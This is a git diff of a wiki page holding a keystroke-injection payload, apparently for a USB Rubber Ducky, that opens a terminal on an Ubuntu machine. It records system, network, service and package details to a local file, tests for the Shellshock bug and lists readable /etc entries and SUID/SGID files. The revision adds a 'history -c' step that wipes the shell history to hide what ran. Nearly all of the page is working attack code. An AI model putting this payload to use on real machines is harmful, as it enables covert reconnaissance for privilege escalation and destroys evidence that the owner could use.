diff --git a/Payload---Information-Gathering-Ubuntu.md b/Payload---Information-Gathering-Ubuntu.md index 0602481..0fd60ff 100644 --- a/Payload---Information-Gathering-Ubuntu.md +++ b/Payload---Information-Gathering-Ubuntu.md @@ -1,26 +1,22 @@ The following script is an information gatherer script which collects info from a running Ubuntu OS and saves it to a file named "info_gathering.txt". The info that the script retrieves is the logged in username, the distribution and kernel version of the running system, the applicability of the shellsock bug, the mounted filesystems, information which is related to the Network adapters, availability of development tools (python, g++), contents of the hosts file and the listening TCP/UDP connections. Apart from that it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files. - REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock + REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D DELAY 3000 - ALT F2 - DELAY 300 - STRING gnome-terminal - DELAY 100 - ENTER - DELAY 200 + CTRL ALT t + DELAY 1500 STRING clear DELAY 10 ENTER DELAY 50 - STRING echo "Logged in user:" $USER > info_gathering.txt + STRING echo "Logged in user: " $USER > info_gathering.txt ENTER DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 - STRING echo -n "Distribution Kernel Version:" >> info_gathering.txt + STRING echo -n "Distribution Kernel Version: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 @@ -35,30 +31,28 @@ The info that the script retrieves is the logged in username, the distribution a STRING uname -a >> info_gathering.txt DELAY 50 ENTER + DELAY 100 + STRING echo >> info_gathering.txt DELAY 50 + ENTER + DELAY 50 + STRING echo "Shellsock Bug Vulnerability: " >> info_gathering.txt + DELAY 50 + ENTER + DELAY 50 + STRING env x='() { :;}; echo vulnerable' bash -c "echo this is a test" >> info_gathering.txt + DELAY 50 + ENTER DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 - STRING echo "Shellsock Bug Vulnerability" >> info_gathering.txt - DELAY 50 - ENTER - STRING echo >> info_gathering.txt - ENTER - DELAY 50 - STRING env x='() { :;}; echo vulnerable' bash -c `echo hello` >> info_gathering.txt - DELAY 50 - ENTER - DELAY 50 - DELAY 50 - ENTER - DELAY 50 STRING echo >> info_gathering.txt DELAY 50 ENTER DELAY 50 - STRING echo "Mounted filesystems" >> info_gathering.txt + STRING echo "Mounted filesystems: " >> info_gathering.txt ENTER DELAY 50 STRING mount -l >> info_gathering.txt @@ -68,25 +62,23 @@ The info that the script retrieves is the logged in username, the distribution a STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Network Configuration" >> info_gathering.txt + STRING echo "Network Configuration: " >> info_gathering.txt DELAY 50 ENTER DELAY 50 STRING ifconfig -a | grep 'Link\|inet' >> info_gathering.txt ENTER DELAY 50 - STRING STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Print Hosts" >> info_gathering.txt + STRING echo "Print Hosts: " >> info_gathering.txt ENTER DELAY 50 STRING cat /etc/hosts >> info_gathering.txt ENTER DELAY 50 - STRING - STRING echo echo "Print ARP" >> info_gathering.txt + STRING echo "Print ARP: " >> info_gathering.txt ENTER DELAY 50 STRING arp >> info_gathering.txt @@ -95,7 +87,7 @@ The info that the script retrieves is the logged in username, the distribution a STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Development tools availability" >> info_gathering.txt + STRING echo "Development tools availability: " >> info_gathering.txt ENTER DELAY 50 STRING which gcc >> info_gathering.txt @@ -110,7 +102,7 @@ The info that the script retrieves is the logged in username, the distribution a STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Print TCP/UDP Listening Services" >> info_gathering.txt + STRING echo "Print TCP/UDP Listening Services: " >> info_gathering.txt ENTER DELAY 50 STRING netstat -tunlpe >> info_gathering.txt @@ -119,7 +111,7 @@ The info that the script retrieves is the logged in username, the distribution a STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Installed Packages" >> info_gathering.txt + STRING echo "Installed Packages: " >> info_gathering.txt DELAY 50 ENTER DELAY 200 @@ -129,10 +121,10 @@ The info that the script retrieves is the logged in username, the distribution a STRING echo >> info_gathering.txt ENTER DELAY 50 - STRING echo "Find Readable Folders in /etc" >> info_gathering.txt + STRING echo "Find Readable Folders in /etc: " >> info_gathering.txt ENTER DELAY 50 - STRING find /etc -user `id -u` -perm -u=r -o -group `id -g` -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt + STRING find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt ENTER DELAY 500 STRING echo >> info_gathering.txt @@ -143,4 +135,12 @@ The info that the script retrieves is the logged in username, the distribution a DELAY 50 STRING find / -type f -perm -u=s -o -type f -perm -g=s -ls 2> /dev/null >> info_gathering.txt DELAY 50 + ENTER + DELAY 15000 + STRING history -c + DELAY 50 + ENTER + DELAY 50 + STRING exit + DELAY 50 ENTER \ No newline at end of file